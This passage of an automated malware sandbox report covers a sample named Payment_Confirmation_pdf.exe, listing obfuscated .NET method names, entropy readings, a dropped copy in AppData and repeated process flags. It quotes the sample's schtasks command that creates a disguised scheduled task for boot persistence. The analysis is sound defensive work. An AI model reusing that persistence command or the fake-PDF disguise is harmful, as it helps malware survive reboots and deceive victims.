Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00411B76 push cs; ret	10_2_00411B7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040D3D2 push es; ret	10_2_0040D3D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040838E push ebp; ret	10_2_0040838F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_004084C0 push eax; retf	10_2_00408556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0040853F push eax; retf	10_2_00408556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_00411E5F push 00000077h; iretd	10_2_00411E61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014209AD push ecx; mov dword ptr [esp], ecx	10_2_014209B6
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_0186EFB0 push esp; iretd	11_2_0186EFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0118C54D pushfd ; ret	17_2_0118C54E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0118C54F push 8B011167h; ret	17_2_0118C554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011409AD push ecx; mov dword ptr [esp], ecx	17_2_011409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0118C9D7 push edi; ret	17_2_0118C9D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01111FEC push eax; iretd	17_2_01111FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01197E99 push ecx; ret	17_2_01197EAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0042E57F pushad ; ret	17_2_0042E580

Source: Payment_Confirmation_pdf.exe	Static PE information: section name: .text entropy: 7.66363017602626
Source: cQwRvD.exe.0.dr	Static PE information: section name: .text entropy: 7.66363017602626

Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, ELE585f2q8cgK7WX9k.cs	High entropy of concatenated method names: 'iPTEiAKVJ8', 'hV9EddxipL', 'TniEcWDmnb', 'HniceSViKn', 'gy5czeVs0n', 'a8eEvU5N2s', 'AuAEupf7i3', 'wWjEa61tOy', 'QWAEJIJ9an', 'Hb2EM7xlmo'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, QQh4v6ItHd5GNRwOyW.cs	High entropy of concatenated method names: 'rU7cSNXd89', 'D1OcsBEIeL', 'UrgcgwuNpe', 'Mh7cEMVbrt', 'FEkcKJhNJA', 'yIZg5HD6kK', 'SvegZVO5qt', 'iBggLUVJ8C', 'knIgqDBF7R', 'tfogCtwkA5'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, fsUapYuvnnqai8nBi2g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dLJm76jjb5', 'xWPmOGJ7pq', 'EBSmRZNtFR', 'lt6mFRXqvs', 'uSYm3AjYZT', 'FYImAqqmie', 'UkDmbtgAWh'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, b8CuA5A1Ej1kCR6T83.cs	High entropy of concatenated method names: 'ToString', 'qBIY7Feavn', 'NrVYhJjEwP', 'P7uYVjt12s', 'w4MYBZmx9n', 'mXBYo7WvYf', 'g3tYlnMjru', 'DqBYfcif5H', 'wBdYT2jCTi', 'LErYDdkSme'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UVSPe1HaZ7PT1moVSI.cs	High entropy of concatenated method names: 'JBQsFFwi13', 'Emks3yamVi', 'YxDsAvLEiC', 'gaPsbJDuJR', 'Yo8s5yQ4jI', 'CMisZZryph', 'ucusLAdCiZ', 'iXvsqKQbL3', 'UMesCIMSe2', 'VJ8seR2aBv'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, vqi9Pba9LKgBvs3XmW.cs	High entropy of concatenated method names: 'lniNGnlGl', 'N6B6Co2G2', 'wbE9nae4e', 'SPHGNnBOs', 'Krftyl0Jw', 'hbgUhtA7r', 'zw47NjZvwcDJmKPKNN', 'qL5ek7tSGRTFa9S3lX', 'hRF0pPhOm', 'wNBmijvEc'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, f3MFcjb1UuWf1Kxdqn.cs	High entropy of concatenated method names: 'lQ6Q1Hya7i', 'TAZQnVa3X2', 'ToString', 'rCJQii9qbY', 'lD8Qsqy1Vx', 'ygeQdShEgJ', 'LlpQgirbns', 'SraQcBQi0k', 'gdeQEAPcvU', 'mhBQKdsGq6'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UNdLi7t3xRIuFbLkqe.cs	High entropy of concatenated method names: 'LOBd6b587X', 'kJKd9i1HdB', 'BxBdH3MIqU', 'RQwdtavcvF', 'B3GdxLFmki', 'HhndY7VKrC', 'wWldQ2yY0U', 'zYVd03e02B', 'ugkdW5kmvj', 'YYMdmxlKEN'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, FOSDR9uMmZdRc4nkBuK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGPjWLOotw', 'WatjmMrVUu', 'dp4j4LUOTa', 'Eucjjr6oPo', 'z5AjrMLVRW', 'wtnjyh2Gaj', 'tCXjP1jNcr'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UUYgd3F10soYVsFNxD.cs	High entropy of concatenated method names: 'N7Yx8uh1nS', 'EcOxOKB8NS', 'nNuxFvDSCo', 'Y3qx3Zm9Pe', 'BVexhKbpvi', 'qO9xV0nsvs', 'UmixBEb8g2', 'DF5xoKJjTc', 'RhUxlFPsOa', 'm0qxfcLf0X'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs	High entropy of concatenated method names: 'bgyJS3mQDq', 'X9SJi8shuy', 'h7wJsAFvO5', 'HxTJdl21Fr', 'RcYJgWVB4K', 'pp1JccciNo', 'fWIJEZughq', 'PqCJKXTCpI', 'vYdJpZdo2n', 'MCsJ1RGYVJ'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, vJ3WjfU3Ncg3pRa5LK.cs	High entropy of concatenated method names: 'fotgwbOhjZ', 'LhUgG2epyA', 'OYhdVoN4Po', 'z4BdB5BvoY', 'wO6doweoKH', 'vZJdl0sJBR', 'Q3vdfajJvv', 'BtTdTDfysu', 'DUCdDeNbDd', 'jHod8OtGkr'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, e9AOGdzqSq6m1Vq6pv.cs	High entropy of concatenated method names: 'zvQm9Ro5fP', 'XOgmHmH2V1', 'nDjmtE88M8', 'bWlmIb7CxW', 'Il1mhuwlW8', 'FCLmB6CBrG', 'iLBmoQoXRL', 'cK6mP0Z7B9', 'MvMmk6qIvp', 'A78m2Dr8mV'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, Ry3gg7Lm4SYmmjSxUn.cs	High entropy of concatenated method names: 'gANWxYRdSk', 'rhQWQJICZB', 'yL6WWxDDmO', 'T27W4RN3Ho', 'JL0WrB6EXM', 'FjkWPPjlnS', 'Dispose', 'rjW0ipHwxa', 'aa10so6c2K', 'prd0dvEGx8'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, Ar2lcAsu02n7qBEetI.cs	High entropy of concatenated method names: 'Dispose', 'eYmuCmjSxU', 'TTNahTTuEC', 'Vgbvjq6U6P', 'm1EueGJQcL', 'P9xuzFyWac', 'ProcessDialogKey', 'PWxavtvqG7', 'qyEauKaDU3', 'YsnaaLb89O'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, otvqG7C0yEKaDU3esn.cs	High entropy of concatenated method names: 'RSXWIA7ls3', 'IswWhhIkqP', 'elCWVOmrdA', 'jFhWBRrjCc', 'koNWoByDjV', 'sKpWlYOqeY', 'IHOWfs0E6a', 'sv4WT35pPX', 'rxpWDwC3K3', 'Wa0W88XLoO'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, OF1LvyM5IfVAyaR4i4.cs	High entropy of concatenated method names: 'IG5uEVSPe1', 'cZ7uKPT1mo', 'O3xu1RIuFb', 'VkqunerJ3W', 'Qa5uxLKFQh', 'tv6uYtHd5G', 'oBRVVDUK6nfy5dFSKx', 'slDZcTIcf8cOmd42P8', 'MtYl4dMc61HohH9kFh', 'XuRuuqyPox'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, mMVc1wRctYQGJyxEYr.cs	High entropy of concatenated method names: 'RYgXHTLX2n', 'nABXtwmrmk', 'vN3XIledYh', 'kY5XhEp7p6', 'VgyXBhanSX', 'USHXoosZKF', 'zd1Xf73oOO', 'JuOXTWA7jL', 'Y3OX84t87m', 'FQwX7PThAm'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, V35lQEuuVg1mELYWok2.cs	High entropy of concatenated method names: 'PXumeOXlxu', 'Pc7mzFurvp', 'Aun4v09TDH', 'CNn4uWJKqN', 'yeo4aU1HCm', 'sMK4JCHAPP', 'vHj4Mq79Mo', 'qUR4SNTWma', 'Xrw4isvy4w', 'r3u4sHoAni'
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, SbcD8nDaAr6P45q4Kn.cs	High entropy of concatenated method names: 'mglEkZr34q', 'vpAE256dB5', 'WUEENPr7yp', 'DYVE6QbUb5', 'orDEw0rqf5', 'soeE9cZ7dH', 'P3NEGaBNQi', 'YvdEH84Ihe', 'KUBEtuGd3n', 'J7EEUTC9iT'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, ELE585f2q8cgK7WX9k.cs	High entropy of concatenated method names: 'iPTEiAKVJ8', 'hV9EddxipL', 'TniEcWDmnb', 'HniceSViKn', 'gy5czeVs0n', 'a8eEvU5N2s', 'AuAEupf7i3', 'wWjEa61tOy', 'QWAEJIJ9an', 'Hb2EM7xlmo'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, QQh4v6ItHd5GNRwOyW.cs	High entropy of concatenated method names: 'rU7cSNXd89', 'D1OcsBEIeL', 'UrgcgwuNpe', 'Mh7cEMVbrt', 'FEkcKJhNJA', 'yIZg5HD6kK', 'SvegZVO5qt', 'iBggLUVJ8C', 'knIgqDBF7R', 'tfogCtwkA5'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, fsUapYuvnnqai8nBi2g.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dLJm76jjb5', 'xWPmOGJ7pq', 'EBSmRZNtFR', 'lt6mFRXqvs', 'uSYm3AjYZT', 'FYImAqqmie', 'UkDmbtgAWh'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, b8CuA5A1Ej1kCR6T83.cs	High entropy of concatenated method names: 'ToString', 'qBIY7Feavn', 'NrVYhJjEwP', 'P7uYVjt12s', 'w4MYBZmx9n', 'mXBYo7WvYf', 'g3tYlnMjru', 'DqBYfcif5H', 'wBdYT2jCTi', 'LErYDdkSme'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UVSPe1HaZ7PT1moVSI.cs	High entropy of concatenated method names: 'JBQsFFwi13', 'Emks3yamVi', 'YxDsAvLEiC', 'gaPsbJDuJR', 'Yo8s5yQ4jI', 'CMisZZryph', 'ucusLAdCiZ', 'iXvsqKQbL3', 'UMesCIMSe2', 'VJ8seR2aBv'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, vqi9Pba9LKgBvs3XmW.cs	High entropy of concatenated method names: 'lniNGnlGl', 'N6B6Co2G2', 'wbE9nae4e', 'SPHGNnBOs', 'Krftyl0Jw', 'hbgUhtA7r', 'zw47NjZvwcDJmKPKNN', 'qL5ek7tSGRTFa9S3lX', 'hRF0pPhOm', 'wNBmijvEc'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, f3MFcjb1UuWf1Kxdqn.cs	High entropy of concatenated method names: 'lQ6Q1Hya7i', 'TAZQnVa3X2', 'ToString', 'rCJQii9qbY', 'lD8Qsqy1Vx', 'ygeQdShEgJ', 'LlpQgirbns', 'SraQcBQi0k', 'gdeQEAPcvU', 'mhBQKdsGq6'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UNdLi7t3xRIuFbLkqe.cs	High entropy of concatenated method names: 'LOBd6b587X', 'kJKd9i1HdB', 'BxBdH3MIqU', 'RQwdtavcvF', 'B3GdxLFmki', 'HhndY7VKrC', 'wWldQ2yY0U', 'zYVd03e02B', 'ugkdW5kmvj', 'YYMdmxlKEN'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, FOSDR9uMmZdRc4nkBuK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LGPjWLOotw', 'WatjmMrVUu', 'dp4j4LUOTa', 'Eucjjr6oPo', 'z5AjrMLVRW', 'wtnjyh2Gaj', 'tCXjP1jNcr'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UUYgd3F10soYVsFNxD.cs	High entropy of concatenated method names: 'N7Yx8uh1nS', 'EcOxOKB8NS', 'nNuxFvDSCo', 'Y3qx3Zm9Pe', 'BVexhKbpvi', 'qO9xV0nsvs', 'UmixBEb8g2', 'DF5xoKJjTc', 'RhUxlFPsOa', 'm0qxfcLf0X'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs	High entropy of concatenated method names: 'bgyJS3mQDq', 'X9SJi8shuy', 'h7wJsAFvO5', 'HxTJdl21Fr', 'RcYJgWVB4K', 'pp1JccciNo', 'fWIJEZughq', 'PqCJKXTCpI', 'vYdJpZdo2n', 'MCsJ1RGYVJ'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, vJ3WjfU3Ncg3pRa5LK.cs	High entropy of concatenated method names: 'fotgwbOhjZ', 'LhUgG2epyA', 'OYhdVoN4Po', 'z4BdB5BvoY', 'wO6doweoKH', 'vZJdl0sJBR', 'Q3vdfajJvv', 'BtTdTDfysu', 'DUCdDeNbDd', 'jHod8OtGkr'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, e9AOGdzqSq6m1Vq6pv.cs	High entropy of concatenated method names: 'zvQm9Ro5fP', 'XOgmHmH2V1', 'nDjmtE88M8', 'bWlmIb7CxW', 'Il1mhuwlW8', 'FCLmB6CBrG', 'iLBmoQoXRL', 'cK6mP0Z7B9', 'MvMmk6qIvp', 'A78m2Dr8mV'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, Ry3gg7Lm4SYmmjSxUn.cs	High entropy of concatenated method names: 'gANWxYRdSk', 'rhQWQJICZB', 'yL6WWxDDmO', 'T27W4RN3Ho', 'JL0WrB6EXM', 'FjkWPPjlnS', 'Dispose', 'rjW0ipHwxa', 'aa10so6c2K', 'prd0dvEGx8'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, Ar2lcAsu02n7qBEetI.cs	High entropy of concatenated method names: 'Dispose', 'eYmuCmjSxU', 'TTNahTTuEC', 'Vgbvjq6U6P', 'm1EueGJQcL', 'P9xuzFyWac', 'ProcessDialogKey', 'PWxavtvqG7', 'qyEauKaDU3', 'YsnaaLb89O'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, otvqG7C0yEKaDU3esn.cs	High entropy of concatenated method names: 'RSXWIA7ls3', 'IswWhhIkqP', 'elCWVOmrdA', 'jFhWBRrjCc', 'koNWoByDjV', 'sKpWlYOqeY', 'IHOWfs0E6a', 'sv4WT35pPX', 'rxpWDwC3K3', 'Wa0W88XLoO'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, OF1LvyM5IfVAyaR4i4.cs	High entropy of concatenated method names: 'IG5uEVSPe1', 'cZ7uKPT1mo', 'O3xu1RIuFb', 'VkqunerJ3W', 'Qa5uxLKFQh', 'tv6uYtHd5G', 'oBRVVDUK6nfy5dFSKx', 'slDZcTIcf8cOmd42P8', 'MtYl4dMc61HohH9kFh', 'XuRuuqyPox'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, mMVc1wRctYQGJyxEYr.cs	High entropy of concatenated method names: 'RYgXHTLX2n', 'nABXtwmrmk', 'vN3XIledYh', 'kY5XhEp7p6', 'VgyXBhanSX', 'USHXoosZKF', 'zd1Xf73oOO', 'JuOXTWA7jL', 'Y3OX84t87m', 'FQwX7PThAm'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, V35lQEuuVg1mELYWok2.cs	High entropy of concatenated method names: 'PXumeOXlxu', 'Pc7mzFurvp', 'Aun4v09TDH', 'CNn4uWJKqN', 'yeo4aU1HCm', 'sMK4JCHAPP', 'vHj4Mq79Mo', 'qUR4SNTWma', 'Xrw4isvy4w', 'r3u4sHoAni'
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, SbcD8nDaAr6P45q4Kn.cs	High entropy of concatenated method names: 'mglEkZr34q', 'vpAE256dB5', 'WUEENPr7yp', 'DYVE6QbUb5', 'orDEw0rqf5', 'soeE9cZ7dH', 'P3NEGaBNQi', 'YvdEH84Ihe', 'KUBEtuGd3n', 'J7EEUTC9iT'

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File created: C:\Users\user\AppData\Roaming\cQwRvD.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
